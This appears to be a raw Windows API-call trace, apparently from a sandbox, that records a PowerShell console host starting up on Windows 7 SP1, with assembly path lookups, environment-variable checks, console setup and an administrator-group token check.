	[0274.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0274.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0275.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0276.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0276.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0278.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0278.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0278.673] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0278.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0278.673] CoTaskMemFree (pv=0x471c50) 
	[0278.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0278.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x28d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0279.020] SetErrorMode (uMode=0x1) returned 0x1
	[0279.020] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x28d700 | out: lpFileInformation=0x28d700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0279.020] SetErrorMode (uMode=0x1) returned 0x1
	[0284.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0284.966] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0284.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0284.966] CoTaskMemFree (pv=0x471c50) 
	[0284.969] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0284.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0284.969] CoTaskMemFree (pv=0x471c50) 
	[0284.969] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0284.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0284.970] CoTaskMemFree (pv=0x471c50) 
	[0284.972] CoCreateGuid (in: pguid=0x28dac8 | out: pguid=0x28dac8*(Data1=0xff211721, Data2=0x6bb1, Data3=0x4ffe, Data4=([0]=0xb6, [1]=0x58, [2]=0x98, [3]=0xc, [4]=0xf0, [5]=0x20, [6]=0xdd, [7]=0x62))) returned 0x0
	[0284.975] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0284.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0284.976] CoTaskMemFree (pv=0x471c50) 
	[0284.979] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0284.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0284.979] CoTaskMemFree (pv=0x471c50) 
	[0284.981] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0284.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0284.982] CoTaskMemFree (pv=0x471c50) 
	[0284.988] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0285.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x28d770 | out: lpConsoleScreenBufferInfo=0x28d770) returned 1
	[0285.885] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0285.886] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x28d770 | out: lpConsoleScreenBufferInfo=0x28d770) returned 1
	[0285.887] GetVersionExW (in: lpVersionInformation=0x28d700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28d700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0285.890] GetCurrentProcess () returned 0xffffffffffffffff
	[0285.890] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x28d798 | out: TokenHandle=0x28d798*=0x1cc) returned 1
	[0285.893] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28d6b8 | out: TokenInformation=0x0, ReturnLength=0x28d6b8) returned 0
	[0285.894] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x477290
	[0285.895] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x477290, TokenInformationLength=0x4, ReturnLength=0x28d6b8 | out: TokenInformation=0x477290, ReturnLength=0x28d6b8) returned 1
	[0285.896] DuplicateTokenEx (in: hExistingToken=0x1cc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x28d818 | out: phNewToken=0x28d818*=0x1c4) returned 1
	[0285.896] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28d6b8 | out: TokenInformation=0x0, ReturnLength=0x28d6b8) returned 0
	[0285.896] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4772c0
	[0285.896] GetTokenInformation (in: TokenHandle=0x1cc, TokenInformationClass=0x8, TokenInformation=0x4772c0, TokenInformationLength=0x4, ReturnLength=0x28d6b8 | out: TokenInformation=0x4772c0, ReturnLength=0x28d6b8) returned 1
	[0285.897] CheckTokenMembership (in: TokenHandle=0x1c4, SidToCheck=0x2cdf038*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x28d828 | out: IsMember=0x28d828) returned 1
	[0285.898] CloseHandle (hObject=0x1c4) returned 1
	[0285.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0285.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0286.696] CoTaskMemAlloc (cb=0x804) returned 0x1b709900
	[0286.696] GetConsoleTitleW (in: lpConsoleTitle=0x1b709900, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0286.697] CoTaskMemFree (pv=0x1b709900) 
	[0286.709] CoTaskMemAlloc (cb=0x804) returned 0x1b70a1b0
	[0286.709] GetConsoleTitleW (in: lpConsoleTitle=0x1b70a1b0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0286.710] CoTaskMemFree (pv=0x1b70a1b0) 
	[0286.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0286.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0286.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0286.712] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0287.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0287.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0288.332] SetConsoleCtrlHandler (HandlerRoutine=0x27568dc, Add=1) returned 1
	[0288.984] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8
	[0288.985] CoCreateGuid (in: pguid=0x28d910 | out: pguid=0x28d910*(Data1=0x62c5604b, Data2=0x2923, Data3=0x45ee, Data4=([0]=0xb1, [1]=0x13, [2]=0xbe, [3]=0xf3, [4]=0xef, [5]=0x59, [6]=0xf, [7]=0x3b))) returned 0x0
	[0288.986] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.986] CoTaskMemFree (pv=0x471c50) 
	[0288.989] WinSqmIsOptedIn () returned 0x0
	[0288.989] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.990] CoTaskMemFree (pv=0x471c50) 
	[0288.990] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.991] CoTaskMemFree (pv=0x471c50) 
	[0288.991] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.991] CoTaskMemFree (pv=0x471c50) 
	[0288.992] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.992] CoTaskMemFree (pv=0x471c50) 
	[0288.992] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.993] CoTaskMemFree (pv=0x471c50) 
	[0288.994] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.994] CoTaskMemFree (pv=0x471c50) 
	[0288.995] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.995] CoTaskMemFree (pv=0x471c50) 
	[0288.995] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.996] CoTaskMemFree (pv=0x471c50) 
	[0288.998] CoTaskMemAlloc (cb=0x104) returned 0x471c50
	[0288.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471c50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.998] CoTaskMemFree (pv=0x471c50) 
	[0289.003] CoTaskMemAlloc (cb=0x104) returned 0x471c50
